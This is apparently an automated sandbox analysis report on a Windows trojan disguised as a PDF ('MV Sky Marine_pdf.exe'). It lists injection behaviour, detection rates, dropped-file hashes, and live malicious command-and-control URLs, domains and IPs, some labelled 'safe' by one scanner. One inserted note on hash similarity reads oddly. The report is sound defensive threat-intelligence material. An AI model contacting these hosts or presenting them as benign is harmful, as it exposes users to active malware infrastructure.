            DNS/IP: www.fenixforex.com; www.yyxingfa.com (103.48.133.159, 49730 -> 80, XIAOZHIYUN1-AS-APICIDCNETWORKUS, Hong Kong); 14 other IPs or domains
            signature: System process connects to network (likely due to code injection or exploit)
            +-- wlanext.exe (started)
                signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                +-- cmd.exe (started)
                    +-- conhost.exe (started)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
MV Sky Marine_pdf.exe | 33% | Virustotal |
MV Sky Marine_pdf.exe | 23% | ReversingLabs | Win32.Trojan.Wacatac
MV Sky Marine_pdf.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nssBDFE.tmp\lckp0.dll | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\nssBDFE.tmp\lckp0.dll | 17% | ReversingLabs | Win32.Trojan.Generic

Unpacked PE Files

Source | Detection | Scanner | Label
3.1.MV Sky Marine_pdf.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
3.2.MV Sky Marine_pdf.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
2.2.MV Sky Marine_pdf.exe.2670000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
8.2.wlanext.exe.3867960.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
8.2.wlanext.exe.c5de40.1.unpack | 100% | Avira | TR/Patched.Ren.Gen

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
https://hostnl03.fornex.host/404/img/favicon/favicon-32x32.png | 0% | Avira URL Cloud | safe
https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-57x57.png | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
https://hostnl03.fornex.host/404/img/logo | 0% | Avira URL Cloud | safe
https://hostnl03.fornex.host/404/img/logo-dark.png | 0% | Avira URL Cloud | safe
https://hostnl03.fornex.host/404/img/favicon/favicon-16x16.png | 0% | Avira URL Cloud | safe
https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-114x114.png | 0% | Avira URL Cloud | safe
http://www.casinoflames.com/m2be/?t8r=f9OOlDzSNjMkS+voKVj3JAm/FZou7FefMRO/dCbPYFE5jWEAY4Ie1mxxbA2c8ASh8bA/&1bYxT=mTfpcdW | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-120x120.png | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.michaelroberts.gallery/m2be/?t8r=3hs/fdpsiUpFetMliLQ5KTd9k1PXkNk579eBvZhq6Qtrn5Lx9iP8uWKZaCpCbSQvRdph&1bYxT=mTfpcdW | 0% | Avira URL Cloud | safe
www.capacitaciondelfuturo.com/m2be/ | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-76x76.png | 0% | Avira URL Cloud | safe
https://hostnl03.fornex.host/404/img/favicon/favicon-128.png | 0% | Avira URL Cloud | safe
https://www.michaelroberts.gallery/m2be/?t8r=3hs/fdpsiUpFetMliLQ5KTd9k1PXkNk579eBvZhq6Qtrn5Lx9iP8uWK | 0% | Avira URL Cloud | safe
http://www.mantequillahub.pro/m2be/?t8r=ym0xxX00S0Wf+ixf12QOfxKttvR95wzAnITo9bxnjEKQPe2KXbpsv5dlZ+lGmtzP6AJs&1bYxT=mTfpcdW | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-60x60.png | 0% | Avira URL Cloud | safe
https://hostnl03.fornex.host/404/img/logo.png | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.capacitaciondelfuturo.com/m2be/?t8r=JuGytuw0I2CvsJrhKPqxcSs+eAHRIhMzmg6m2gZ2Sf/5EFBq1ZxzSrCArrcyEBWmu86q&1bYxT=mTfpcdW | 0% | Avira URL Cloud | safe
http://www.fenixforex.com/m2be/?t8r=0l3HkT4rKGRjwuaD6GRslzPylepCZX23oOXMbfcPML9ScCqaYm65vOxGdM+olqk7o7hp&1bYxT=mTfpcdW | 0% | Avira URL Cloud | safe
http://www.yyxingfa.com/m2be/?t8r=NWfrKKCiNqgfEu2gJcL26nowwYOKbN5UMUQLTML9o4O8a7GsheA9LuahVJ9lTMe/g8Lv&1bYxT=mTfpcdW | 0% | Avira URL Cloud | safe
https://hostnl03.fornex.host/404/img/favicon/mstile-150x150.png | 0% | Avira URL Cloud | safe
https://hostnl03.fornex.host/404/img/logo-dark | 0% | Avira URL Cloud | safe
https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-144x144.png | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
https://hostnl03.fornex.host/404/css/base.css | 0% | Avira URL Cloud | safe
https://hostnl03.fornex.host/404/img/favicon/mstile-310x310.png | 0% | Avira URL Cloud | safe
https://hostnl03.fornex.host/404/img/favicon/favicon-196x196.png | 0% | Avira URL Cloud | safe
https://hostnl03.fornex.host/404/img/favicon/mstile-70x70.png | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
https://hostnl03.fornex.host/404/img/icons/search.png | 0% | Avira URL Cloud | safe
https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-72x72.png | 0% | Avira URL Cloud | safe
https://hostnl03.fornex.host/404/img/prlx-bg-main.png | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.somht.com/m2be/?t8r=ifCDsBLKzPO1/caYwbP7ucLsNIzdB7eAVK9yl0hh16u0W5iMVAB6bdOGECjvY1n5rRJ4&1bYxT=mTfpcdW | 0% | Avira URL Cloud | safe
https://hostnl03.fornex.host/404/img/favicon/mstile-144x144.png | 0% | Avira URL Cloud | safe
https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-152x152.png | 0% | Avira URL Cloud | safe
https://hostnl03.fornex.host/404/img/favicon/mstile-310x150.png | 0% | Avira URL Cloud | safe
https://hostnl03.fornex.host/404/img/favicon/favicon-96x96.png | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | --- | ---
yjmanks.sitelockcdn.net | 108.167.156.70 | true | true | | unknown
www.casinoflames.com | 94.46.58.25 | true | true | | unknown
www.yyxingfa.com | 103.48.133.159 | true | true | | unknown
michaelroberts.gallery | 192.0.78.25 | true | true | | unknown
rahasiasuksesbo.com | 180.235.151.22 | true | true | | unknown
www.capacitaciondelfuturo.com | 172.67.161.235 | true | true | | unknown
antiracismbyu.com | 206.189.174.29 | true | true | | unknown
www.maggionaossurvey.com | 81.17.18.197 | true | true | | unknown
www.somht.com | 172.106.71.28 | true | true | | unknown
www.mantequillahub.pro | 185.18.52.85 | true | true | | unknown
www.xcash.fund | unknown | unknown | true | | unknown
www.antiracismbyu.com | unknown | unknown | true | | unknown
www.fabulousfalafel.com | unknown | unknown | true | | unknown
www.michaelroberts.gallery | unknown | unknown | true | | unknown
www.fenixforex.com | unknown | unknown | true | | unknown
www.rahasiasuksesbo.com | unknown | unknown | true | | unknown
www.verratjewelry.com | unknown | unknown | true | | unknown
www.cvhrcm.com | unknown | unknown | true | | unknown
www.best10hostings.com | unknown | unknown | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
--- | --- | --- | ---
http://www.casinoflames.com/m2be/?t8r=f9OOlDzSNjMkS+voKVj3JAm/FZou7FefMRO/dCbPYFE5jWEAY4Ie1mxxbA2c8ASh8bA/&1bYxT=mTfpcdW | true | Avira URL Cloud: safe | unknown
http://www.michaelroberts.gallery/m2be/?t8r=3hs/fdpsiUpFetMliLQ5KTd9k1PXkNk579eBvZhq6Qtrn5Lx9iP8uWKZaCpCbSQvRdph&1bYxT=mTfpcdW | true | Avira URL Cloud: safe | unknown
www.capacitaciondelfuturo.com/m2be/ | true | Avira URL Cloud: safe | low
http://www.mantequillahub.pro/m2be/?t8r=ym0xxX00S0Wf+ixf12QOfxKttvR95wzAnITo9bxnjEKQPe2KXbpsv5dlZ+lGmtzP6AJs&1bYxT=mTfpcdW | true | Avira URL Cloud: safe | unknown
http://www.capacitaciondelfuturo.com/m2be/?t8r=JuGytuw0I2CvsJrhKPqxcSs+eAHRIhMzmg6m2gZ2Sf/5EFBq1ZxzSrCArrcyEBWmu86q&1bYxT=mTfpcdW | true | Avira URL Cloud: safe | unknown
http://www.fenixforex.com/m2be/?t8r=0l3HkT4rKGRjwuaD6GRslzPylepCZX23oOXMbfcPML9ScCqaYm65vOxGdM+olqk7o7hp&1bYxT=mTfpcdW | true | Avira URL Cloud: safe | unknown
http://www.yyxingfa.com/m2be/?t8r=NWfrKKCiNqgfEu2gJcL26nowwYOKbN5UMUQLTML9o4O8a7GsheA9LuahVJ9lTMe/g8Lv&1bYxT=mTfpcdW | true | Avira URL Cloud: safe | unknown
http://www.somht.com/m2be/?t8r=ifCDsBLKzPO1/caYwbP7ucLsNIzdB7eAVK9yl0hh16u0W5iMVAB6bdOGECjvY1n5rRJ4&1bYxT=mTfpcdW | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | ---
https://fornex.com/dedicated/ | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | | high
https://hostnl03.fornex.host/404/img/favicon/favicon-32x32.png | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designersG | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | | high
https://fornex.com/help/transfer-site/ | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | | high
https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-57x57.png | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/? | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
https://hostnl03.fornex.host/404/img/logo | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://hostnl03.fornex.host/404/img/logo-dark.png | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://fornex.com/vpn/ | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com/designers? | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | | high
https://hostnl03.fornex.host/404/img/favicon/favicon-16x16.png | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-114x114.png | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://fornex.com/ | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | | high
http://www.tiro.com | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | | high
https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-120x120.png | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.goodfont.co.kr | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.sajatypeworks.com | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
https://fornex.com/help/cpanel-first-steps/ | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | | high
http://www.typography.netD | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://fontfabrik.com | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
https://fornex.com/my/tickets/ | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | | high
https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-76x76.png | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://hostnl03.fornex.host/404/img/favicon/favicon-128.png | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.michaelroberts.gallery/m2be/?t8r=3hs/fdpsiUpFetMliLQ5KTd9k1PXkNk579eBvZhq6Qtrn5Lx9iP8uWK | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-60x60.png | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://hostnl03.fornex.host/404/img/logo.png | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fonts.com | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.sakkal.com | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.js | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | | high
https://fornex.com/backup/ | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | | high
https://fornex.com/ssd-hosting/ | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | | high
https://hostnl03.fornex.host/404/img/favicon/mstile-150x150.png | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://hostnl03.fornex.host/404/img/logo-dark | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | MV Sky Marine_pdf.exe | false | | high
https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-144x144.png | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
https://hostnl03.fornex.host/404/css/base.css | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://hostnl03.fornex.host/404/img/favicon/mstile-310x310.png | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | | high
https://hostnl03.fornex.host/404/img/favicon/favicon-196x196.png | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://hostnl03.fornex.host/404/img/favicon/mstile-70x70.png | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | | high
http://nsis.sf.net/NSIS_Error | MV Sky Marine_pdf.exe | false | | high
https://fornex.com/antiddos/ | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | | high
https://hostnl03.fornex.host/404/img/icons/search.png | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-72x72.png | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://fornex.com/ssd-vps/ | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | | high
https://hostnl03.fornex.host/404/img/prlx-bg-main.png | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
https://fornex.com/help/faq/ | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com/designers8 | explorer.exe, 00000004.00000000.256954284.000000000BC36000.00000002.00000001.sdmp | false | | high
https://hostnl03.fornex.host/404/img/favicon/mstile-144x144.png | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-152x152.png | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://hostnl03.fornex.host/404/img/favicon/mstile-310x150.png | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://hostnl03.fornex.host/404/img/favicon/favicon-96x96.png | wlanext.exe, 00000008.00000002.499864155.00000000039E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
206.189.174.29 | antiracismbyu.com | United States | 14061 | DIGITALOCEAN-ASNUS | true
94.46.58.25 | www.casinoflames.com | Sweden | 200719 | MISSDOMAINSE | true
192.0.78.25 | michaelroberts.gallery | United States | 2635 | AUTOMATTICUS | true
185.18.52.85 | www.mantequillahub.pro | Spain | 49981 | WORLDSTREAMNL | true
172.106.71.28 | www.somht.com | United States | 40676 | AS40676US | true
172.67.161.235 | www.capacitaciondelfuturo.com | United States | 13335 | CLOUDFLARENETUS | true
81.17.18.197 | www.maggionaossurvey.com | Switzerland | 51852 | PLI-ASCH | true
108.167.156.70 | yjmanks.sitelockcdn.net | United States | 46606 | UNIFIEDLAYER-AS-1US | true
103.48.133.159 | www.yyxingfa.com | Hong Kong | 136800 | XIAOZHIYUN1-AS-APICIDCNETWORKUS | true

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 372691
Start date: 22.03.2021
Start time: 08:53:54
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 9s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: MV Sky Marine_pdf.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/2@15/9
EGA Information: Failed
HDC Information:
• Successful, ratio: 19.1% (good quality ratio 17%)
• Quality average: 72.9%
• Quality standard deviation: 32.8%
HCA Information:
• Successful, ratio: 86%
• Number of executed functions: 92
• Number of non-executed functions: 68
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 104.43.139.144, 92.122.145.220, 13.88.21.125, 184.30.24.56, 52.255.188.83, 51.104.144.132, 52.147.198.201, 2.20.142.210, 2.20.142.209, 51.11.168.160, 92.122.213.247, 92.122.213.194, 20.54.26.129
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs


Domains

No context

ASN

                                                                                                SecuriteInfo.com.Trojan.DownLoader37.55025.782.dllGet hashmaliciousBrowse
                                                                                                • 178.128.243.14
                                                                                                44273,5055075232.dllGet hashmaliciousBrowse
                                                                                                • 178.128.243.14
                                                                                                dat.dllGet hashmaliciousBrowse
                                                                                                • 178.128.243.14
                                                                                                l3OyyFeToY.dllGet hashmaliciousBrowse
                                                                                                • 138.197.197.35
                                                                                                44272.806433912.dat.dllGet hashmaliciousBrowse
                                                                                                • 178.128.243.14
                                                                                                mousemux-setup.exeGet hashmaliciousBrowse
                                                                                                • 167.99.38.114

                                                                                                JA3 Fingerprints

                                                                                                No context

                                                                                                Dropped Files

                                                                                                No context

Created / dropped Files

Note: the SSDEEP digests of the two files below use the same block size (3072) and share almost the entire hash body, so nssBDFD.tmp contains the same bytes as lckp0.dll plus roughly 10 KB of additional data (187547 vs 177152 bytes); treat the .tmp as a second copy of the DLL payload even though only the DLL has antivirus hits.

                                                                                                C:\Users\user\AppData\Local\Temp\nssBDFD.tmp
                                                                                                Process:C:\Users\user\Desktop\MV Sky Marine_pdf.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):187547
                                                                                                Entropy (8bit):7.850430779574342
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:2ArIjcpQbh2dkiL64dfqSPRr+HLbTEtw59PSWPQorM00LIheCB1XxwY1Y:2u/QNiLxfqSZOTEtwnSWPQormUheC7XO
                                                                                                MD5:0512C98FCBA19C3C1B6E0CD903627777
                                                                                                SHA1:88070FAB47EB1D67366D7BD8BF64AEF0000AA58D
                                                                                                SHA-256:0D73943E5E9AFA3AA87B2E7F24EA32EF84D84C2139397525B75C019A213C5656
                                                                                                SHA-512:E67F6D08023D53312DC754C3366EB1F7FE05D39942C4ABE7A26D42917A36E60C92602B19539C34C37ECE45F189FEE70CC9D02A96EF4DCB0BE4E8A2B4C0D2585D
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview: .(......,...................r.... .......'.......(..............................................................[...........................................................................................................................................................................................%...f.......................................................................;...............J.......................................j.......................b.......................................................................................................j...............................................................................................................................j.......$.......................................................................................................................j.......0...............*...........................@...........................................................................d.......................................................
                                                                                                C:\Users\user\AppData\Local\Temp\nssBDFE.tmp\lckp0.dll
                                                                                                Process:C:\Users\user\Desktop\MV Sky Marine_pdf.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):177152
                                                                                                Entropy (8bit):7.979072239159664
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:4rIjcpQbh2dkiL64dfqSPRr+HLbTEtw59PSWPQorM00LIheCB1XxwY1Y:W/QNiLxfqSZOTEtwnSWPQormUheC7XxI
                                                                                                MD5:21FC7780B8E1CEAA4ECAE15EBCE9DD1F
                                                                                                SHA1:1C2E7B7F7119D38BBC93E632DD9E5207960525FB
                                                                                                SHA-256:91C7F9E706910931792BA9BFCC3E90AEF1ADBD938D8B9BA513CE212A1195A6EC
                                                                                                SHA-512:CEA2A9E9A5AAC3E014FCE940FBD71DD570865EBD1FD114D07AD8722D00CDA4077F021D7807D3459EFA892C974C443D8320842CF6D3120CB9B343CFA47D1201A8
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                                                Reputation:low
                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...{.W`...........!.........$............... ...............................`....................................... ..P....!.......P............................................................................... ...............................text............................... ..`.rdata....... ......................@..@.data...@....0......................@....rsrc........P.......0..............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                Entropy (8bit):7.9026927638111815
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:MV Sky Marine_pdf.exe
                                                                                                File size:211985
                                                                                                MD5:9558601f64f4d03a49bf20b3c0186af0
                                                                                                SHA1:adaf4ce8f18f8085ead9a4d92a5806ac3c54921d
                                                                                                SHA256:00e599fadd6b7cd568751d9741ad77f85a7c9fdea785deed6898f348efd794fd
                                                                                                SHA512:f88d21d3c6904a4b47faa49c61e1be4d9e90c0de8bda575607c3497df292a5b32b83b1a9538bd4d064ece5f26b3d14651279f77692104e7fa2515a8eb8105ee4
                                                                                                SSDEEP:6144:FXMjo3ufkHcKKdZPfC4ORl9nTUDTjQvWQwB:lufCc9S4O1nIDgWQU
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ .@.A...A...A../N...A...A..tA../N...A...b...A..+G...A..Rich.A..........PE..L...b:.V.................^....9.....o2.......p....@

                                                                                                File Icon

                                                                                                Icon Hash:00828e8e8686b000

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x40326f
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x56FF3A62 [Sat Apr 2 03:20:02 2016 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
